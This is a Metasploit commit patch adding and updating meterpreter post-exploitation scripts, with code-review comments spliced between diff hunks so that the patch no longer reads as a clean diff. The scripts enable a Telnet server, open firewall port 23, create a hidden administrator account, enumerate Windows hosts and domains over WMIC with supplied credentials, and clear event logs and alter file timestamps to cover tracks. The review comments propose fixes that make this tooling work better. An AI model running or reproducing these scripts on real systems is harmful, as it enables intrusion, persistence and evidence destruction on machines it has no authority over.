From e6ef0ab4952f6ffe70d70de7bccee2e49dbafa2b Mon Sep 17 00:00:00 2001
From: HD Moore
Date: Fri, 30 Jan 2009 06:18:02 +0000
Subject: [PATCH] New scripts and updated scripts from Carlos Perez

git-svn-id: file:///home/svn/framework3/trunk@6202 4d416f70-5f16-0410-b530-b9f4589650da

---
 scripts/meterpreter/gettelnet.rb | 201 +++++++++++++++++++++++++
 scripts/meterpreter/netenum.rb | 67 +++++++--
 scripts/meterpreter/remotewinenum.rb | 210 +++++++++++++++++++++++++++
 scripts/meterpreter/winenum.rb | 58 +++++++-
 4 files changed, 519 insertions(+), 17 deletions(-)
 create mode 100644 scripts/meterpreter/gettelnet.rb
 create mode 100644 scripts/meterpreter/remotewinenum.rb

diff --git a/scripts/meterpreter/gettelnet.rb b/scripts/meterpreter/gettelnet.rb
new file mode 100644
index 0000000000..79196b4c05
--- /dev/null
+++ b/scripts/meterpreter/gettelnet.rb
@@ -0,0 +1,201 @@ +#!/usr/bin/env ruby +# +#Meterpreter script for enabling Telnet Server on Windows 2003, Windows Vista +#Windows 2008 and Windows XP targets using native windows commands. +#Provided by Carlos Perez at carlos_perez[at]darkoperator.com +#Verion: 0.1.1 +#Note: If the Telnet Server is not installed in Vista or win2k8 +# it will be installed. +################## Variable Declarations ################## + +session = client +@@exec_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-e" => [ false, "Enable Telnet Server only." ], + "-p" => [ true, "The Password of the user to add." ], + "-u" => [ true, "The Username of the user to add." ] + ) +def checkifinst(session) + r = session.sys.process.execute("sc query state= all",nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + if d =~ (/TlntSvr/) + return true + end + + end + r.channel.close + r.close +end + +#------------------------------------------------------------------------------- +def winver(session) + stringtest = "" + verout = [] + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + stringtest << d + end + r.channel.close + r.close + + verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) + version = nil + if verout[0] == "6" + if verout[1] == "0" + version = "Windows Vista/Windows 2008" + elsif verout[1] == "1" + version = "Windpows 7" + end + elsif verout [0] == "5" + if verout[1] == "0" + version = "Windows 2000" + elsif verout[1] == "1" + version = "Windows XP" + elsif verout[1] == "2" + version = "Windows 2003" + end + end + version +end + +#--------------------------------------------------------------------------------------------------------- +def insttlntsrv(session) + trgtos = winver(session) + if trgtos =~ /(Windows Vista)/ + if checkifinst(session) + print_status("Telnet Service Installed on Target") + else + print_status("Installing Telnet Server Service 
......") + session.response_timeout=90 + r = session.sys.process.execute("pkgmgr /iu:\"TelnetServer\"",nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + r.channel.close + r.close + end + end + end + +#--------------------------------------------------------------------------------------------------------- +def enabletlntsrv(session) + tmpout = [ ] + cmdout = [] + key2 = "HKLM\\SYSTEM\\CurrentControlSet\\Services\\TlntSvr" + root_key2, base_key2 = session.sys.registry.splitkey(key2) + value2 = "Start" + begin + open_key = session.sys.registry.open_key(root_key2, base_key2, KEY_READ) + v2 = open_key.query_value(value2) + print_status "Setting Telnet Server Services service startup mode" + if v2.data != 2 + print_status "\tThe Telnet Server Services service is not set to auto, changing it to auto ..." + cmmds = [ 'sc config TlntSvr start= auto', "sc start TlntSvr", ] + cmmds. each do |cmd| + r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + end + else + print_status "\tTelnet Server Services service is already set to auto" + end + #Enabling Exception on the Firewall + print_status "\tOpening port in local firewall if necessary" + r = session.sys.process.execute('netsh firewall set portopening protocol = tcp port = 23 mode = enable', nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + rescue::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end +end +#--------------------------------------------------------------------------------------------------------- +def addrdpusr(session, username, password) + tmpout = [ ] + cmdout = [] + print_status "Setting user account for logon" + print_status "\tAdding User: #{username} with Password: #{password}" + begin + r = 
session.sys.process.execute("net user #{username} #{password} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "\tAdding User: #{username} to local group TelnetClients" + r = session.sys.process.execute("net localgroup \"TelnetClients\" #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "\tAdding User: #{username} to local group Administrators" + r = session.sys.process.execute("net localgroup Administrators #{username} /add", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + tmpout << d + end + cmdout << tmpout + r.channel.close + r.close + print_status "You can now login with the created user" + rescue::Exception => e + print_status("The following Error was encountered: #{e.class} #{e}") + end +end +#--------------------------------------------------------------------------------------------------------- +def message + print_status "Windows Telnet Server Enabler Meterpreter Script" +end +def usage + print( + "Windows Telnet Server Enabler Meterpreter Script\n" + + "Usage: getgui -u -p \n" + + @@exec_opts.usage + ) +end +################## MAIN ################## +# Parsing of Options +usr = nil +pass = nil +lport = nil +enbl = nil +@@exec_opts.parse(args) { |opt, idx, val| + case opt + when "-u" + usr = val + when "-p" + pass = val + when "-h" + usage + break + when "-n" + lport = val.to_i + when "-e" + enbl = 1 + end + +} +if enbl == 1 + message + insttlntsrv(session) + enabletlntsrv(session) + +elsif usr!= nil && pass != nil + message + insttlntsrv(session) + enabletlntsrv(session) + addrdpusr(session, usr, pass) + +else + usage +end + diff --git a/scripts/meterpreter/netenum.rb b/scripts/meterpreter/netenum.rb index a7e6e55ba0..71f7fd3038 100644 --- a/scripts/meterpreter/netenum.rb 
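Review bot: `insttlntsrv` appends to `tmpout` in its read loop but never initialises it, so the install branch (`pkgmgr /iu:"TelnetServer"`) raises NameError on the first chunk of output; add `tmpout = ""` before the `execute` call, or drop the accumulation since the output is never used. `checkifinst` returns `true` from inside the read loop without closing the channel or process, and when the service is absent it returns the value of `r.close` rather than `false`; collect the output first, close, then return the match result as in the excerpt below. `winver` is copied verbatim into this file, remotewinenum.rb and winenum.rb in the same commit; it belongs in one shared helper, and each copy dereferences `verout[0]` without checking that `scan` matched, so unexpected `ver` output raises NoMethodError instead of returning `nil` (the `minor, major` locals it also assigns are unused and do not hold what their names say). The `rescue ::Exception` clauses in `enabletlntsrv` and `addrdpusr` should be `rescue ::StandardError` (or a bare `rescue`) so that Interrupt and SystemExit are not swallowed. The option parser also handles a `-n` flag that `@@exec_opts` does not declare, and the usage text names `getgui` rather than `gettelnet`.
```ruby
def checkifinst(session)
  r = session.sys.process.execute("sc query state= all", nil, {'Hidden' => true, 'Channelized' => true})
  output = ""
  while(d = r.channel.read)
    output << d
  end
  r.channel.close
  r.close
  output.include?("TlntSvr")
end
```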
+++ b/scripts/meterpreter/netenum.rb @@ -4,7 +4,7 @@ require 'ftools' #Meterpreter script for ping sweeps on Windows 2003, Windows Vista #Windows 2008 and Windows XP targets using native windows commands. #Provided by Carlos Perez at carlos_perez[at]darkoperator.com -#Verion: 0.1.1 +#Verion: 0.1.2 #Note: ################## Variable Declarations ################## @@exec_opts = Rex::Parser::Arguments.new( @@ -15,7 +15,8 @@ require 'ftools' "-fl" => [ false, "To Perform DNS Forward Lookup on host list and domain"], "-hl" => [ true, "File with Host List for DNS Forward Lookup"], "-d" => [ true, "Domain Name for DNS Forward Lookup"], - "-st" => [ false, "To Perform DNS lookup of MX, NS and SOA records for a domain"] + "-st" => [ false, "To Perform DNS lookup of MX and NS records for a domain"], + "-sr" => [ false, "To Perform Service Record DNS lookup for a domain"] ) session = client @@ -38,12 +39,14 @@ dest = logs + "/" + host + filenameinfo def stdlookup(session,domain,dest) dest = dest + "-general-record-lookup.txt" print_status("Getting MX and NS Records for Domain #{domain}") - filewrt(dest,"MX and NS Records for Domain #{domain}") + filewrt(dest,"SOA, NS and MX Records for Domain #{domain}") + types = ["SOA","NS","MX"] mxout = [] results = [] garbage = [] + types.each do |t| begin - r = session.sys.process.execute("nslookup -query=mx #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) + r = session.sys.process.execute("nslookup -type=#{t} #{domain}", nil, {'Hidden' => true, 'Channelized' => true}) while(d = r.channel.read) mxout << d end 
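Review bot: In `stdlookup` the new `types.each` loop reuses `mxout` across iterations without clearing it, so the output of the SOA lookup is re-split and re-printed under the NS and MX labels (the part of the loop body that prints is in the following hunk); move `mxout = []` inside the loop or add `mxout.clear` at the end of each iteration. The `print_status("Getting MX and NS Records for Domain ...")` line and the `-st` option description still say MX and NS while the file header written just below now says SOA, NS and MX; make the three agree. `mxout.to_s` relies on Array#to_s concatenating the elements, which is Ruby 1.8 behaviour; `mxout.join` is explicit and keeps working on later rubies.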
@@ -51,17 +54,19 @@ def stdlookup(session,domain,dest) r.close results = mxout.to_s.split(/\n/) results.each do |rec| - if rec =~ /(Name:)/ or rec =~ /(Address:)/ or rec =~ /(Server:)/ - garbage << rec - else - print_status("\t#{rec}") - filewrt(dest,"#{rec}") - end + if rec.match(/\s*internet\saddress\s\=\s/) + garbage << rec.split(/\s*internet\saddress\s\=/) + print_status("#{garbage[0].to_s.sub(" "," ")} #{t} ") + filewrt(dest,garbage[0].to_s.sub(" "," ")+" #{t} ") + garbage.clear + end + garbage.clear end rescue ::Exception => e print_status("The following Error was encountered: #{e.class} #{e}") end + end end #------------------------------------------------------------------------------- # Function for writing results of other functions to a file 
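Review bot: `garbage[0].to_s.sub(" "," ")` replaces one space with one space and is therefore a no-op; if the intent is to tidy the host name, `strip` or `squeeze(" ")` on the split result is what is needed. `garbage << rec.split(/\s*internet\saddress\s\=/)` pushes an Array, so `garbage[0].to_s` again depends on 1.8 Array#to_s; `name = rec.split(/\s*internet\saddress\s\=/).first` gives the same string without the temporary array, and makes both `garbage.clear` calls (the second of which is redundant with the first) unnecessary. Only lines containing `internet address =` are printed, so if nslookup reports MX and SOA entries on other line shapes (e.g. `mail exchanger =`), those records are dropped and only the accompanying A records survive — worth confirming against real output. `rescue ::Exception => e` should be `rescue ::StandardError => e`. The `begin` this rescue belongs to, and `stdlookup` itself, start in the previous hunk.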
@@ -215,6 +220,39 @@ def pingsweep(session,iprange,dest) end end #------------------------------------------------------------------------------- +#Function for enumerating srv records +def srvreclkp(session,domain,dest) + dest = dest + "-srvenum.txt" + srout = [] + garbage = [] + srvrcd = [ + "_gc._tcp.","_kerberos._tcp.", "_kerberos._udp.","_ldap._tcp.","_test._tcp.", + "_sips._tcp.","_sip._udp.","_sip._tcp.","_aix._tcp.","_aix._tcp.","_finger._tcp.", + "_ftp._tcp.","_http._tcp.","_nntp._tcp.","_telnet._tcp.","_whois._tcp."] + print_status("Performing SRV Record Enumeration for #{domain}") + filewrt(dest,"SRV Record Enumeration for #{domain}") + srvrcd.each do |srv| + r = session.sys.process.execute("nslookup -query=srv #{srv}#{domain}", nil, {'Hidden' => true, 'Channelized' => true}) + while(d = r.channel.read) + srout << d + end + r.channel.close + r.close + results = srout.to_s.split(/\n/) + results.each do |rec| + if rec.match(/\s*internet\saddress\s\=\s/) + garbage << rec.split(/\s*internet\saddress\s\=/) + print_status("\tfor #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}") + filewrt(dest,"for #{srv}#{domain} #{garbage[0].to_s.sub(" "," ")}") + garbage.clear + end + garbage.clear + srout.clear + end + end + +end +#------------------------------------------------------------------------------- #Function to print message during run def message(dest) print_status "Network Enumerator Meterpreter Script " @@ -231,10 +269,12 @@ frdlkp = nil dom = nil hostlist = nil helpcall = nil +srvrc = nil # Parsing of Options @@exec_opts.parse(args) { |opt, idx, val| case opt - + when "-sr" + srvrc = 1 when "-rl" rvrslkp = 1 when "-fl" @@ -249,6 +289,7 @@ helpcall = nil hostlist = val when "-r" range = val + when "-h" print( "Network Enumerator Meterpreter Script\n" + 
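Review bot: `srvreclkp` has no `begin`/`rescue` around the `execute`/read sequence, unlike `stdlookup` and the other lookup functions in this file, so a single failed process launch aborts the remaining SRV queries and the script; wrap the loop body the same way, rescuing `::StandardError` and reporting via `print_status`. `srout.clear` sits inside the inner `results.each` loop, where it runs once per parsed line; it belongs after that loop, next to the final `garbage.clear`, so the buffer is reset once per SRV name. `"_aix._tcp."` appears twice in `srvrcd` and produces a duplicate query, and `garbage[0].to_s.sub(" "," ")` is the same no-op substitution as in `stdlookup`.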
@@ -270,7 +311,11 @@ elsif dom != nil && hostlist!= nil && frdlkp == 1 message(logs) frwdlp(session,hostlist,dom,dest) elsif dom != nil && stdlkp == 1 + message(logs) stdlookup(session,dom,dest) +elsif dom != nil && srvrc == 1 + message(logs) + srvreclkp(session,dom,dest) elsif helpcall == nil print( "Network Enumerator Meterpreter Script\n" + diff --git a/scripts/meterpreter/remotewinenum.rb b/scripts/meterpreter/remotewinenum.rb new file mode 100644 index 0000000000..5b01ea36d6 --- /dev/null +++ b/scripts/meterpreter/remotewinenum.rb 
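Review bot: The new `elsif dom != nil && srvrc == 1` branch, like its siblings, compares against `nil` explicitly; `elsif dom && srvrc == 1` is the idiomatic form, and since `srvrc` only ever holds `nil` or `1`, a boolean flag would read more clearly than the integer sentinel. The `message(logs)` + lookup pairs are now repeated in four branches; selecting the lookup first and calling `message(logs)` once would keep the option handling in one place. This `if`/`elsif` chain starts in the previous hunk.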
@@ -0,0 +1,210 @@ +#!/usr/bin/env ruby +# +#Meterpreter script for basic enumeration of Windows 2003, Windows Vista +# and Windows XP remote targets using native windows command wmic. +#Provided by Carlos Perez at carlos_perez[at]darkoperator.com +#Verion: 0.1.1 +#Note: +################## Variable Declarations ################## +session = client +# Variables for Options +helpcall = 0 +rusr = nil +rpass = nil +trg = "" +# Script Options +@@exec_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu."], + "-t" => [ true, "The target address"], + "-u" => [ true, "User on the target system (If not provided it will use credential of process)"], + "-p" => [ true, "Password of user on target system"] +) + +# Create Filename info to be appended to downloaded files +filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S") + +# Create a directory for the logs +logs = ::File.join(Msf::Config.config_directory, 'logs', 'remotewinenum') + +# Create the log directory +::FileUtils.mkdir_p(logs) + +# WMIC Commands that will be executed on the Target +wmic = [ + 'environment list', + 'share list', + 'nicconfig list', + 'computersystem list', + 'useraccount list', + 'group list', + 'sysaccount list', + 'volume list brief', + 'service list brief', + 'process list brief', + 'startup list full', + 'rdtoggle list', + 'qfe list' +] +################## Function Declarations ################## + +# Function for running a list of WMIC commands stored in a array, returs string +def wmicexec(session,wmic,user,pass,trgt) + print_status("Running WMIC Commands ....") + tmpout = '' + command = nil + runfail = 0 + runningas = session.sys.config.getuid + begin + tmp = session.fs.file.expand_path("%TEMP%") + # Temporary file on windows host to store results + wmicfl = tmp + "\\wmictmp#{rand(100000)}.txt" + + wmic.each do |wmi| + if user == nil + print_status("The commands will be ran under the credentials of #{runningas}") + command = "/node:#{trgt} /append:#{wmicfl} #{wmi}" + else + 
command = "/user:#{user} /password:#{pass} /node:#{trgt} /append:#{wmicfl} #{wmi}" + end + print_status "\trunning command wimic #{wmi}" + r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + r = session.sys.process.execute("cmd.exe /c echo Output of wmic #{wmi} from #{trgt} >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + r = session.sys.process.execute("cmd.exe /c echo ***************************************** >> #{wmicfl}",nil, {'Hidden' => 'true'}) + sleep(1) + #print_status "\twmic #{command}" + r = session.sys.process.execute("cmd.exe /c wmic #{command}", nil, {'Hidden' => true}) + sleep(2) + r.close + end + # Read the output file of the wmic commands + wmioutfile = session.fs.file.new(wmicfl, "rb") + until wmioutfile.eof? + tmpout << wmioutfile.read + end + # Close output file in host + wmioutfile.close + rescue ::Exception => e + print_status("Error running WMIC commands: #{e.class} #{e}") + end + # We delete the file with the wmic command output. 
+ c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true}) + c.close + tmpout +end +#------------------------------------------------------------------------------- +# Function for writing results of other functions to a file +def filewrt(file2wrt, data2wrt) + output = ::File.open(file2wrt, "a") + data2wrt.each do |d| + output.puts(d) + end + output.close +end +#------------------------------------------------------------------------------ +# Function to generate report header +def headerbuid(session,target,dest) + # Header for File that will hold all the output of the commands + info = session.sys.config.sysinfo + header = "Date: #{::Time.now.strftime("%Y-%m-%d.%H:%M:%S")}\n" + header << "Running as: #{client.sys.config.getuid}\n" + header << "From: #{info['Computer']}\n" + header << "OS: #{info['OS']}\n" + header << "Target: #{target}\n" + header << "\n\n\n" + + print_status("Saving report to #{dest}") + header + +end +#------------------------------------------------------------------------------ +def winver(session) + stringtest = "" + verout = [] + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + stringtest << d + end + r.channel.close + r.close + + verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) + version = nil + if verout[0] == "6" + if verout[1] == "0" + version = "Windows Vista/Windows 2008" + elsif verout[1] == "1" + version = "Windpows 7" + end + elsif verout [0] == "5" + if verout[1] == "0" + version = "Windows 2000" + elsif verout[1] == "1" + version = "Windows XP" + elsif verout[1] == "2" + version = "Windows 2003" + end + end + version +end + +#------------------------------------------------------------------------------ +# Function Help Message +def helpmsg + print( + "Remote Windows Enumeration Meterpreter Script\n" + + "This script will enumerate windows hosts in the target enviroment\n" + + "given a username and password or 
using the credential under witch\n" + + "Meterpeter is running using WMI wmic windows native tool.\n" + + "Usage:\n" + + @@exec_opts.usage + ) +end +################## MAIN ################## + +localos = winver(session) + +# Check that the command is not being ran on a Win2k host +# since wmic is not present in Windows 2000 +if localos =~ /(Windows 2000)/ + print_status("This script is not supported to be ran from Windows 2000 servers!!!") +else + # Parsing of Options + @@exec_opts.parse(args) { |opt, idx, val| + case opt + + when "-t" + trg = val + when "-u" + rusr = val + when "-p" + rpass = val + when "-h" + helpmsg + helpcall = 1 + end + + } +#logfile name +dest = logs + "/" + trg + filenameinfo +# Executing main logic of the script +if helpcall == 0 and trg != "" + +# Making sure that is running as System a Username and Password for target machine must be provided + + if session.sys.config.getuid == "NT AUTHORITY\\SYSTEM" && rusr == nil && rpass == nil + + print_status("Stopped: Running as System and no user provided for connecting to target!!") + + else trg != nil && helpcall != 1 + + filewrt(dest,headerbuid(session,trg,dest)) + filewrt(dest,wmicexec(session,wmic,rusr,rpass,trg)) + + end +elsif helpcall == 0 and trg == "" + + helpmsg +end +end diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb index 14f992f5d3..1958a7f5dd 100644 --- a/scripts/meterpreter/winenum.rb +++ b/scripts/meterpreter/winenum.rb @@ -3,7 +3,7 @@ #Meterpreter script for basic enumeration of Windows 2000, Windows 2003, Windows Vista # and Windows XP targets using native windows commands. #Provided by Carlos Perez at carlos_perez[at]darkoperator.com -#Verion: 0.3.2 +#Verion: 0.3.4 #Note: Compleatly re-writen to make it modular and better error handling. # Working on adding more Virtual Machine Checks and looking at improving # the code but retain the independance of each module so it is easier for 
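Review bot: In the main block, `else trg != nil && helpcall != 1` is an `else` followed by a bare expression, not a condition: Ruby evaluates `trg != nil && helpcall != 1` and discards it, so the enumeration runs whenever the SYSTEM check above fails, which is probably the intent but the misleading expression should go (plain `else`) or the branch be written as `elsif`. In `wmicexec` the three `echo` launches each overwrite `r` without closing the previous process handle, and the `sleep(1)`/`sleep(2)` calls are the only thing ordering those writes before `wmioutfile` is read; running the commands through a Channelized `execute` and draining the channel, as the other scripts do, would be deterministic and would not leak handles. `headerbuid` takes `session` but calls `client.sys.config.getuid`, and its `dest` parameter is unused. `filewrt` iterates `data2wrt.each`, which only works on a String under Ruby 1.8; `each_line` behaves the same there and keeps working on later rubies. The log path is built as `logs + "/" + trg + filenameinfo` from the raw `-t` value; `::File.join(logs, ::File.basename(trg) + filenameinfo)` keeps an unusual target string from placing the log outside the log directory.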
@@ -33,13 +33,18 @@ commands = [ 'ipconfig /displaydns', 'route print', 'net view', - 'netstat -na', + 'netstat -nao', + 'netstat -vb', 'netstat -ns', 'net accounts', + 'net accounts /domain', + 'net session', 'net share', 'net group', 'net user', 'net localgroup', + 'net localgroup administrators', + 'net group administrators', 'net view /domain', 'netsh firewall show config', 'tasklist /svc' @@ -62,11 +67,12 @@ cmdstomp = [ wmic = [ 'computersystem list', 'useraccount list', - 'group', + 'group list', 'service list brief', 'volume list brief', 'process list brief', 'startup list full', + 'rdtoggle list', 'qfe', ] #Specific Commands for Windows vista for Wireless Enumeration @@ -84,6 +90,12 @@ nonwin2kcmd = [ 'wbem\\wmic.exe', 'netsh.exe', ] +# Executables not pressent in Windows 2000 +nowin2kexe = [ + 'netsh.exe', + 'tasklist.exe', + 'wbem\\wmic.exe', +] ################## Function Declarations ################## # Function to check if Target Machine a VM @@ -357,7 +369,7 @@ end def covertracks(session,cmdstomp) clrevtlgs(session) info = session.sys.config.sysinfo - trgtos = info['OS'] + trgtos = winver(session) if trgtos =~ /(Windows 2000)/ chmace(session,cmdstomp - nonwin2kcmd) else 
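Review bot: The new `nowin2kexe` list duplicates `nonwin2kcmd` (whose visible tail is `'wbem\\wmic.exe', 'netsh.exe'`) with `tasklist.exe` added, and the Windows 2000 handling now happens twice: `covertracks` already does `chmace(session,cmdstomp - nonwin2kcmd)` for that OS, and the `@@ -566` hunk subtracts `nowin2kexe` again before calling it. Keep one list and one subtraction, inside `covertracks`, so the two cannot drift apart. `covertracks` also calls `winver(session)` itself although main has just computed `trgtos = winver(session)`, which spawns `cmd.exe /c ver` twice per run; passing `trgtos` in as a parameter removes the second launch. With `trgtos` no longer derived from `sysinfo`, the `info = session.sys.config.sysinfo` line in `covertracks` may now be unused — its body continues outside the hunk, so worth checking.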
@@ -488,6 +500,36 @@ def killApp(session,procpid) session.sys.process.kill(procpid) print_status("Old process #{procpid} killed.") end +#------------------------------------------------------------------------------- +def winver(session) + stringtest = "" + verout = [] + r = session.sys.process.execute("cmd.exe /c ver", nil, {'Hidden' => 'true','Channelized' => true}) + while(d = r.channel.read) + stringtest << d + end + r.channel.close + r.close + + verout, minor, major = stringtest.scan(/(\d)\.(\d)\.(\d*)/) + version = nil + if verout[0] == "6" + if verout[1] == "0" + version = "Windows Vista/Windows 2008" + elsif verout[1] == "1" + version = "Windpows 7" + end + elsif verout [0] == "5" + if verout[1] == "0" + version = "Windows 2000" + elsif verout[1] == "1" + version = "Windows XP" + elsif verout[1] == "2" + version = "Windows 2003" + end + end + version +end #--------------------------------------------------------------------------------------------------------- # Function to execute process migration @@ -537,7 +579,7 @@ if helpopt != 1 header << "Host: #{info['Computer']}\n" header << "OS: #{info['OS']}\n" header << "\n\n\n" - trgtos = info['OS'] + trgtos = winver(session) print_status("Saving report to #{dest}") filewrt(dest,header) filewrt(dest,chkvm(session)) @@ -566,7 +608,11 @@ if helpopt != 1 end if (cm != nil) filewrt(dest,"EventLogs where Cleared") - covertracks(session,cmdstomp) + if trgtos =~ /(Windows 2000)/ + covertracks(session,cmdstomp - nowin2kexe) + else + covertracks(session,cmdstomp) + end end print_status("Done!") end